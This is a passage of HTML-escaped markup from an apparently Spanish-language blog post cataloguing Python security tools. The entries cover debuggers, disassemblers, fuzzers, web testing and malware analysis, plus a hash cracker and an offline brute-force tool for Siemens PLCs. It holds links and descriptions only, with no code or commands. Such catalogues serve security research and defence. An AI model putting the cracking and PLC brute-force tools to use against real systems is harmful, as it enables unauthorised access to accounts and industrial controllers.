name="more"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Depuración e ingeniería inversa:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/androguard/"&gt;Androguard&lt;/a&gt;: ingeniería inversa y análisis de aplicaciones de Android&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/xupeng/apkjet" target="_blank"&gt;apk-jet&lt;/a&gt;: un wrap de apktool en python para automatizar y hacer más fácil la ingeniería inversa de apks&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/Falaina/AsmJit-Python" target="_blank"&gt;AsmJit&lt;/a&gt;:  sencillo wrapper en Python para AsmJit usando SWIG. AsmJit posee clases  de generación de código de alto nivel que pueden utilizarse para crear  código JIT&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pypi.python.org/pypi/BeaEnginePython/" target="_blank"&gt;BeaEnginePython&lt;/a&gt;: bindings de BeaEngine en Python de Mario Vilas.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://code.google.com/p/binwalk/" target="_blank"&gt;Binwalk&lt;/a&gt;: &lt;span class="" id="result_box" lang="es"&gt; &lt;span class="hps"&gt;es&lt;/span&gt; &lt;span class="hps"&gt;una herramienta de análisis&lt;/span&gt; &lt;span class="hps"&gt;firmware&lt;/span&gt; &lt;span class="hps"&gt;diseñada para&lt;/span&gt; &lt;span class="hps"&gt;ayudar en el análisis&lt;/span&gt;&lt;span class=""&gt;, la extracción&lt;/span&gt; &lt;span class="hps"&gt;y la ingeniería&lt;/span&gt; &lt;span class="hps"&gt;inversa&lt;/span&gt; &lt;span class="hps"&gt;de&lt;/span&gt; &lt;span class="hps"&gt;imágenes del firmware&lt;/span&gt; &lt;span class="hps"&gt;y otros&lt;/span&gt; &lt;span class="hps"&gt;blobs&lt;/span&gt; &lt;span class="hps"&gt;binarios.&lt;/span&gt; &lt;span class="hps"&gt;Es&lt;/span&gt; &lt;span class="hps"&gt;fácil de utilizar,&lt;/span&gt; &lt;span class="hps"&gt;completamente programable&lt;/span&gt; &lt;span class="hps"&gt;y&lt;/span&gt; &lt;span class="hps"&gt;se puede extender fácilmente&lt;/span&gt; &lt;span class="hps"&gt;a través de&lt;/span&gt; &lt;span class="hps"&gt;firmas personalizadas&lt;/span&gt;, reglas &lt;span class="hps"&gt;de extracción&lt;/span&gt; &lt;span class="hps"&gt;y módulos de&lt;/span&gt; &lt;span class="hps"&gt;plugin.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="https://github.com/zynamics/bochs-python-instrumentation" target="_blank"&gt;bochs-python-instrumentation&lt;/a&gt;:  Este parche para Bochs proporciona un intérprete de Python en lugar del  propio depurador Bochs, proporcionando la funcionalidad del depurador.  También permite interactuar con la interfaz de instrumentación bajo  demanda, al asociar dinámicamente métodos de Python para manejar eventos  de instrumentación.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="https://github.com/grugq/Buggery" target="_blank"&gt;Buggery: &lt;/a&gt;wrapper python para DbgEng.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="http://sourceforge.net/projects/ctypes/" target="_blank"&gt;ctypes&lt;/a&gt;:  módulo de Python que permite crear y manipular tipos de datos de C en  Python. Estos luego pueden pasar a funciones C cargadas desde librerías  de vínculos dinámicos.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="http://www.cuckoosandbox.org/" target="_blank"&gt;Cuckoo:&lt;/a&gt; sistema sandbox de análisis de malware automatizado. Tiene un API para  personalizar tanto el procesamiento como las etapas de presentación de  informes.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="https://github.com/jbremer/darm" target="_blank"&gt;Darm&lt;/a&gt;: Un ligero y eficiente desensamblador escrito en C para el conjunto de instrucciones ARMv7&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="http://www.nektra.com/products/deviare-api-hook-windows/" target="_blank"&gt;Deviare&lt;/a&gt;: es una API para hooks diseñada para crear productos de usuario final&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="https://diabind.codeplex.com/" target="_blank"&gt;Diabind&lt;/a&gt;: Python binding de DIA (Debug Interface Access) SDK&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;a href="http://code.google.com/p/distorm/" target="_blank"&gt;Dislib&lt;/a&gt;: Librería python para leer ficheros PE+ &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.ragestorm.net/distorm/"&gt;diStorm&lt;/a&gt;:&amp;nbsp; biblioteca de desensamblador para AMD64, bajo licencia BSD&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://d-dome.net/idapython/"&gt;IDAPython&lt;/a&gt;: &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;plugin de &lt;/span&gt;&lt;/span&gt;IDA Pro que integra Python, permitiendo ejecutar scripts en IDA Pro&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.immunityinc.com/products-immdbg.shtml"&gt;Immunity Debugger&lt;/a&gt;: GUI programable &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;y&lt;/span&gt;&lt;/span&gt; debugger en linea de comandos&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/OpenRCE/paimei"&gt;Paimei&lt;/a&gt;: framework de ingeniería inversa, incluye &lt;a href="https://github.com/OpenRCE/pydbg"&gt;PyDBG&lt;/a&gt;, PIDA, pGRAPH&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/pefile/"&gt;pefile&lt;/a&gt;: permite leer y trabajar con archivos Portable Executable (PE)&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/libdasm/source/browse/trunk/pydasm/pydasm.c"&gt;pydasm&lt;/a&gt;: interfaz en Python para la librería &lt;a href="http://code.google.com/p/libdasm/"&gt;libdasm&lt;/a&gt; de desensamblado x86&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pydbgeng.sourceforge.net/"&gt;PyDbgEng&lt;/a&gt;: wrapper en Python para el motor de depuración de Microsoft Windows&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/pyemu/"&gt;PyEMU&lt;/a&gt;: emulador IA-32 completamente programable, útil para análisis de malware&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://bitbucket.org/haypo/python-ptrace/wiki/Home"&gt;python-ptrace&lt;/a&gt;:depurador usando ptrace (Linux, BSD y Darwin system call para trazar procesos) escrito en Python&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/"&gt;mona.py&lt;/a&gt;: PyCommand para Immunity Debugger que reemplaza y mejora pvefindaddr&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://oss.coresecurity.com/projects/uhooker.htm"&gt;uhooker&lt;/a&gt;:  intercepta llamadas a llamadas a la API dentro de DLLs , así como las  direcciones arbitrarias en el archivo ejecutable en la memoria&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/vdebug/"&gt;vdb / vtrace&lt;/a&gt;: API de depuración de procesos multi-plataforma implementado en python, y vdb es un depurador que lo utiliza &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Fuzzing:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://antiparser.sourceforge.net/"&gt;antiparser&lt;/a&gt;: fuzz testing y API de inyección de fallos&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://construct.wikispaces.com/"&gt;Construct&lt;/a&gt;: librería para parsear y construir estructuras de datos (binario o texto).&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://isecpartners.com/tools/application-security/forensic-fuzzing-tools.aspx"&gt;Forensic Fuzzing Tools&lt;/a&gt;:  genera ficheros fuzzeados, sistemas de ficheros, y sistemas de ficheros  con ficheros fuzzeados para probar la robustez de herramientas forenses  y sistemas de análisis&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/haypo/fusil/wiki/Home"&gt;Fusil&lt;/a&gt;: librería en Python usada para escribir programas de fuzzing&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://sites.google.com/site/felipeandresmanzano/fuzzer.py?attredirects=0"&gt;fuzzer.py (feliam)&lt;/a&gt;: fuzzer &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;sencillo de&lt;/span&gt;&lt;/span&gt; Felipe Andres Manzano&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://isecpartners.com/tools/application-security/fuzzbox.aspx"&gt;Fuzzbox&lt;/a&gt;: multi-codec media fuzzer&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.packetstormsecurity.org/fuzzer/mistress.rar"&gt;Mistress&lt;/a&gt;: genera formatos de archivos al vuelo y protocolos con datos malformados, basados en patrones predefinidos&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://peachfuzz.sourceforge.net/"&gt;Peach Fuzzing Platform&lt;/a&gt;: framework de fuzzing extensible para la generación y la mutación basada en fuzzing (la v2 fue escrita en Python)&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.powerfuzzer.com/"&gt;Powerfuzzer&lt;/a&gt;: fuzzer web altamente automatizado y totalmente personalizable (protocolo HTTP basado en fuzzer de aplicación)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.fuzzing.org/wp-content/SMUDGE.zip"&gt;SMUDGE&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/OpenRCE/sulley"&gt;Sulley&lt;/a&gt;: framework de desarrollo fuzzer y pruebas que consiste en varios componentes extensibles&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://sourceforge.net/projects/taof/"&gt;TAOF&lt;/a&gt;: (el Arte del Fuzzing) incluye ProxyFuzz, un fuzzer man-in -the-middle de red no determinista&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://untidy.sourceforge.net/"&gt;untidy&lt;/a&gt;: fuzzer XML de propósito general&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://isecpartners.com/tools/application-security/windows-ipc-fuzzing-tools.aspx"&gt;Windows IPC Fuzzing Tools&lt;/a&gt;: herramientas para fuzzear aplicaciones que usan mecanimos Windows Interprocess Communication&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://www.isecpartners.com/tools/application-security/wsbang.aspx"&gt;WSBang&lt;/a&gt;: ejecuta pruebas automáticas contra servicios web SOAP&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Web:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://funkload.nuxeo.org/"&gt;FunkLoad&lt;/a&gt;: medidor de carga web funcional&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://jeanphix.me/Ghost.py/"&gt;Ghost.py&lt;/a&gt;: cliente webkit escrito en Python&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://httpie.org/"&gt;HTTPie&lt;/a&gt;: cliente http similar a cURL pero más intuitivo.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://mitmproxy.org/"&gt;mitmproxy&lt;/a&gt;: proxy HTTP de interceptación con soporte SSL. Permite inspeccionar y editar tráfico al vuelo.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://python-requests.org/"&gt;Requests&lt;/a&gt;: librería HTTP sencilla y elegante, hecha para seres humanos&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://twill.idyll.org/"&gt;Twill&lt;/a&gt;: navega por Internet mediante un interface en línea de comandos. Soporta &lt;i&gt;web testing &lt;/i&gt;automatizado&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pathod.net/"&gt;pathod / pathoc&lt;/a&gt;: demonio/cliente para saturar clientes y servidores HTTP&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://www.isecpartners.com/tools/application-security/proxmon.aspx"&gt;ProxMon&lt;/a&gt;: procesa logs de proxy y crea informes con los resultados&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/python-spidermonkey/"&gt;python-spidermonkey&lt;/a&gt;: binding para el motor &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;JavaScript&lt;/span&gt;&lt;/span&gt; de Mozilla SpiderMonkey; permite llamar y evaluar scripts y funciones Javascript&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="selenium:%20API%20para%20escribir%20pruebas%20funcionales%20usando%20el%20WebDriver%20Selenium%20para%20acceso%20a%20Firefox,%20Ie,%20Chrome,%20Remote%20etc." target="_blank"&gt;Selenium&lt;/a&gt;: API para escribir pruebas funcionales usando el WebDriver Selenium para acceso a Firefox, Ie, Chrome, Remote etc.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://splinter.cobrateam.info/" target="_blank"&gt;Splinter&lt;/a&gt;:  herramienta para testear aplicaciones web usando Python que permite  automatizar acciones del navegador como visitar URLs e interactuar con  sus objetos. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/spynner/"&gt;spynner&lt;/a&gt;: módulo de navegación web programable para Python con soporte Javascript/AJAX&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://www.isecpartners.com/tools/application-security/wsmap.aspx"&gt;WSMap&lt;/a&gt;: encuentra servicios web y descubre ficheros&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.getwindmill.com/"&gt;Windmill&lt;/a&gt;: herramienta de pruebas creada para automatizar y depurar aplicaciones web&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Cracking:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;a href="https://github.com/Rurik/Noriben" target="_blank"&gt; &lt;/a&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://code.google.com/p/findmyhash/" target="_blank"&gt;findmyhash&lt;/a&gt;:&amp;nbsp; script en Python para crackear hashes usando servicios online.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Malware:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;a href="https://github.com/Rurik/Noriben" target="_blank"&gt; &lt;/a&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/Rurik/Noriben" target="_blank"&gt;Noriben&lt;/a&gt;: script que funciona en conjunción con Procmon de Sysinternals para analizar malware en sandbox. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pastebin.com/0G9Q2k6y"&gt;s7-brute-offline.py&lt;/a&gt;: herramienta que que puede realizar ataques off-line de fuerza bruta contra controladores lógicos programables (PLCs) Siemens. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-family: 